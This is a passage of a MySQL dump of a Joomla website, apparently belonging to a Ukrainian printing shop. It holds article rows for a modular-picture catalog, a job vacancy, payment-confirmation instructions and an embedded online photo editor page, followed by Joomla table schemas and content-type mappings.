15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 188px;\">\r\n							<td style=\"height: 188px;\">\r\n								<p>&nbsp;<img src=\"images/modulnie%20kartini/MK-2.jpg\" alt=\"MK 2\" width=\"200\" height=\"151\" style=\"float: left;\" /></p>\r\n							</td>\r\n							<td style=\"height: 188px;\">&nbsp;<img src=\"images/modulnie%20kartini/МК-3.jpg\" alt=\"МК 3\" width=\"200\" height=\"151\" style=\"float: left;\" /></td>\r\n							<td style=\"height: 188px;\">&nbsp;<img src=\"images/modulnie%20kartini/МК-4.jpg\" alt=\"МК 4\" width=\"200\" height=\"118\" style=\"float: left;\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\">&nbsp;<span style=\"color: #000080;\"><strong><span style=\"font-size: 14pt;\">МК-2</span></strong>\r\n								</span>\r\n							</td>\r\n							<td style=\"text-align: center; height: 18px;\">&nbsp;<strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-3</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\">&nbsp;<strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-4</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 93х67</td>\r\n							<td style=\"height: 15px;\">&nbsp;Разм. картины (см): 90х50</td>\r\n							<td style=\"height: 15px;\">&nbsp;Разм. картины (см): 112х60</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. модулей:30х50, 30х50, 30х50</td>\r\n							<td style=\"height: 15px;\">Разм. модулей:30х50, 30х50, 30х50</td>\r\n							<td style=\"height: 15px;\">Разм. модулей:20х50, 30х50, 60х40</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 142px;\">\r\n							<td style=\"height: 142px;\"><img src=\"images/modulnie%20kartini/МК-5.jpg\" alt=\"МК 5\" width=\"200\" height=\"128\" style=\"float: left;\" /></td>\r\n							<td style=\"height: 142px;\">&nbsp;<img src=\"images/modulnie%20kartini/МК-6.jpg\" alt=\"МК 6\" width=\"200\" height=\"137\" /></td>\r\n							<td style=\"height: 142px;\">&nbsp;<img src=\"images/modulnie%20kartini/МК-7.jpg\" alt=\"МК 7\" width=\"200\" height=\"139\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\">&nbsp;<strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-5</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\">&nbsp;<strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-6</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\">&nbsp;<strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-7</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">190грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 116х67</td>\r\n							<td style=\"height: 15px;\">&nbsp;Разм. картины (см): 60х40</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;Разм. картины (см): 75х45</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. модулей:70х45, 45х70</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;Разм. модулей:40х20, 40х20</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;Разм. модулей:20х45, 30х30, 25х20</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n					</tbody>\r\n				</table>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<h1 style=\"color: #000000; text-align: center; width: 770px; height: 37px;\"><span id=\"_mce_caret\" data-mce-bogus=\"true\"><span style=\"font-size: 12pt; color: #000000;\"></span></span>\r\n</h1>','',1,8,'2016-05-16 07:43:23',62,'','2019-05-20 10:02:29',62,0,'0000-00-00 00:00:00','2016-05-16 07:43:23','0000-00-00 00:00:00','{}','{}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',28,3,'Интернет-каталог модульных картин','ЭкваторПринт предлагает большой выбор модульных картин с нашего интернет каталога для оформления заказа.',1,40501,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(40,92,'експеримент','eksperiment','','',-2,8,'2016-11-14 13:42:06',62,'','2016-11-14 13:42:06',0,0,'0000-00-00 00:00:00','2016-11-14 13:42:06','0000-00-00 00:00:00','{}','{}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,32,'','',1,2,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(41,94,'Работа','rabota','<h1 style=\"text-align: center;\"><span style=\"color: #ff0000;\">Работа в ЭКВАТОРпринт</span></h1>\r\n<p><span style=\"font-size: 12pt; color: #000000;\">Открыты следующие вакансии:</span></p>\r\n<h2><span style=\"color: #ff0000;\">Помощник оператора широкоформатного принтера</span></h2>\r\n<p><strong><span style=\"font-size: 12pt; color: #000000;\">Наша компания ищет молодого сотрудника на производство на должность помощника оператора широкоформатного принтера. </span></strong></p>\r\n<p><span style=\"font-size: 12pt; color: #000000;\">Мы предлагаем <em>интересную работу в дружном коллективе в двух минутах от ст.м. Спортивная.</em> </span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt; color: #0000ff;\">&nbsp;<strong>Ваша работа:</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"></span><span style=\"font-size: 12pt; color: #000000;\">- постпечатная обработка заказов;</span></p>\r\n<p><span style=\"font-size: 12pt; color: #000000;\"></span><span style=\"font-size: 12pt; color: #000000;\">- помощь оператору в контроле процессов печати;</span></p>\r\n<p><span style=\"font-size: 12pt; color: #000000;\"></span><span style=\"font-size: 12pt;\"><span style=\"font-size: 10pt; color: #000000;\">&nbsp; &nbsp;Рабочий график: пн-пт.9.00-18.00</span></span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\">&nbsp;<strong><span style=\"color: #0000ff;\">Обязательные требования:</span></strong> </span></p>\r\n<p><span style=\"font-size: 12pt;\"></span><span style=\"font-size: 12pt; color: #000000;\">- трудолюбие;</span></p>\r\n<p><span style=\"font-size: 12pt;\"></span><span style=\"font-size: 12pt; color: #000000;\">- пунктуальность;</span></p>\r\n<p><span style=\"font-size: 12pt;\"></span><span style=\"font-size: 12pt; color: #000000;\">- ответственность;</span></p>\r\n<p><span style=\"font-size: 12pt;\"></span><span style=\"font-size: 12pt; color: #000000;\">- отсутствие вредных привычек;</span></p>\r\n<p><em><strong><span style=\"font-size: 12pt; color: #000000;\">Приветствуется опыт работы на производстве или в сфере строительства.</span></strong></em></p>\r\n<p><span style=\"font-size: 12pt; color: #000000;\"> Опыт работы в сфере <strong>полиграфического</strong> производства не обязателен. Всему научим, главное - Ваше трудолюбие и желание работать! </span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt; color: #ff0000;\">Трудоустройство по результатам собеседования. </span></p>\r\n<p><span style=\"font-size: 14pt; color: #000000;\">Если Вас заинтересовала наша вакансия, звоните: </span></p>\r\n<p><span style=\"color: #000000; font-size: 18pt;\"><span style=\"color: #0000ff;\">тел.: 067-801-90-55 Сергей Александрович&nbsp;</span></span></p>\r\n<p>&nbsp;</p>','',1,8,'2016-11-26 14:54:56',62,'','2016-12-03 15:32:26',62,62,'2019-04-23 10:18:50','2016-11-26 14:54:56','0000-00-00 00:00:00','{}','{}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',61,2,'работа на производстве харьков, работа харьков','Работа в ЭКВАТОРпринт',1,494,'{\"robots\":\"noindex, follow\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(42,95,'Как подтвердить оплату за заказ','kak-podtverdit-oplatu-za-zakaz','<h1 style=\"text-align: center;\"><span style=\"color: #000cff;\">Как подтвердить оплату за заказ</span></h1>\r\n<div style=\"font-size: 140%; text-align: justify; margin: 12px; padding: 12px; background-color: #fffef2;\">\r\n	<p><strong>Если не получается отправить квитанцию по почте</strong>, напишите пожалуйста нам на почту <span style=\"font-size: 120%;\">точное время перевода, сумму и ФИО отправителя.</span> Мы будем искать Ваш платеж. Средний срок поиска составляет 6 рабочих часов, но иногда, в редких случаях, может составлять до 3х рабочих дней, если банк задерживает перевод.</p>\r\n	<p>Срок изготовления заказа увеличивается на срок поиска платежа, т.к. заказ будет запущен в работу только после того, как мы найдем платеж. <strong>При получнии копии чека, или скрина платежки, заказ запускается в работу сразу.</strong></p>\r\n</div>\r\n<div style=\"margin: 12px;\">\r\n	<p>&nbsp;</p>\r\n	<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"background-image: initial; background-position: initial; background-repeat: initial; background-attachment: initial;\">Если оплату осуществляли через Приват 24 или через терминал, в Вашем аккаунте в Приват 24 должны сохраняться все квитанции и истории платежей. Сохранить квитанцию можно так:</span><br /> <br /> </span>\r\n	</p>\r\n	<p style=\"margin-bottom: 12pt; line-height: normal;\"><span style=\"font-family: Arial, sans-serif;\">Приват24 - все услуги – архив (самый нижний) - справа значок (стрелочка \"детально\") - распечатать (нажимаете) - появляется платежка - слева внизу значок \"М\" - там надо выбрать \"PDF файл\" - распечатать - и сохранить у себя на компьютере&nbsp;<span style=\"font-family: Arial, sans-serif; font-size: 8pt;\">(см. рис. ниже)</span> затем эту платежку прислать электронной почтой нам.&nbsp;<span style=\"font-size: 80%;\"><br /></span></span>\r\n	</p>\r\n	<p><img src=\"images/oplata_za_zakaz/vze%20yslygi_arhiv.jpg\" alt=\"vze yslygi arhiv\" width=\"238\" height=\"215\" />&nbsp; &nbsp; &nbsp;&nbsp;<img src=\"images/oplata_za_zakaz/detalnaya%20informacia.jpg\" alt=\"detalnaya informacia\" width=\"237\" height=\"215\" />&nbsp; &nbsp; &nbsp;<img src=\"images/oplata_za_zakaz/raspechatat.jpg\" alt=\"raspechatat\" width=\"240\" height=\"216\" /></p>\r\n	<p>&nbsp;</p>\r\n	<p style=\"margin-bottom: 12pt; line-height: normal;\">&nbsp;</p>\r\n</div>','',1,8,'2017-10-25 08:58:39',62,'','2019-01-28 14:11:18',62,62,'2019-04-23 10:18:48','2017-10-25 08:58:39','0000-00-00 00:00:00','{}','{}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',40,1,'','',1,2754,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(43,101,'Онлайн фоторедактор ','fotoredaktor','<h1>Онлайн фоторедактор редактор макетов</h1>\r\n<div>\r\n	<iframe src=\"https://www.photopea.com#STRING_VALUE\" width=\"759\" height=\"700\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"font-size: 120%;\">В редакторе макетов, который представлен выше, Вы можете полностью подготавливать и сохранять макеты как для заказа картин, так и для заказа баннеров, самоклеющейся пленки и другой полиграфической продукции. <span style=\"font-size: 120%;\"><strong>Редактером можно пользоваться онлайн с компьютера и со смартфона, абсолютно бесплатно</strong>.</span></p>\r\n<div style=\"margin: 20px; margin-top: 2em; font-size: 120%; border-left: 10px solid #faf27f; padding-left: 10px;\">\r\n	<p>Для того чтобы развернуть фоторедактор во весь экран, необходимо нажать левой кнопкой мышки на свободном месте верхней панели меню редактора, зажимая кнопку мышки передвинуть меню влево до появления значка полноэкранного просмотра как на рисунке ниже, затем нажать значек, и редактор откроется на весь экран Вашего устройства. Использовать редактор во всесь экран устройства будет удобней.</p>\r\n	<p><img src=\"images/photoredactor_fullscreen.jpg\" height=\"300\" /></p>\r\n	<p>После каждой загрузки нового изображения в редактор, редактор будет выходить из режима полноэкранного просмотра, и в режим полноэкранного просмотра заходить нужно будет заново. При сохранении изображения редактор остается в полноэкранном режиме.</p>\r\n</div>\r\n<p>Если у Вас есть навыки работы в программе Фотошоп и Вы хотите создавать или редактировать макеты онлайн, данный редактор будет для Вас очень полезным и удобным.</p>\r\n<h2>Фоторедактор онлайн можно применять для следующих задач:</h2>\r\n<p style=\"font-size: 140%;\"><span style=\"color: #0000ff;\">Подготовить макет для заказа фотокартины.</span> Видео о том как подготовить макет, можно посмотреть на нашем сайте в разделе <a href=\"printing-on-canvas#maketvideo\">ПЕЧАТЬ НА ХОЛСТЕ</a></p>\r\n<p style=\"font-size: 140%;\">Быстро и легко <span style=\"color: #0000ff;\">самостоятельно изготовить несложный макет баннера или фотозоны.</span> Видео как подготовить макет баннера можно посмотреть в разделе <a href=\"banner-printing#maketbannera\">ПЕЧАТЬ БАННЕРОВ</a></p>','',1,8,'2021-07-04 09:47:28',62,'','2021-07-21 13:00:20',62,62,'2021-07-21 13:00:20','2021-07-04 09:47:28','0000-00-00 00:00:00','{}','{}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',65,0,'','Бесплатный онлайн фоторедактор. Для подготовки макетов фотокартин, модульных картин, баннеров, фотозон и другой полиграфической продукции.',1,9106,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','','');
/*!40000 ALTER TABLE `j25_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_content_frontpage`
--

DROP TABLE IF EXISTS `j25_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_content_frontpage`
--

LOCK TABLES `j25_content_frontpage` WRITE;
/*!40000 ALTER TABLE `j25_content_frontpage` DISABLE KEYS */;
INSERT INTO `j25_content_frontpage` VALUES (4,1);
/*!40000 ALTER TABLE `j25_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_content_rating`
--

DROP TABLE IF EXISTS `j25_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(10) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(10) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_content_rating`
--

LOCK TABLES `j25_content_rating` WRITE;
/*!40000 ALTER TABLE `j25_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_content_types`
--

DROP TABLE IF EXISTS `j25_content_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_content_types` (
  `type_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `type_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `table` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `rules` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_mappings` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `router` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content_history_options` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON string for com_contenthistory options',
  PRIMARY KEY (`type_id`),
  KEY `idx_alias` (`type_alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=10007 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_content_types`
--

LOCK TABLES `j25_content_types` WRITE;
/*!40000 ALTER TABLE `j25_content_types` DISABLE KEYS */;
INSERT INTO `j25_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\", \"note\":\"note\"}, \"special\":{\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(3,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", 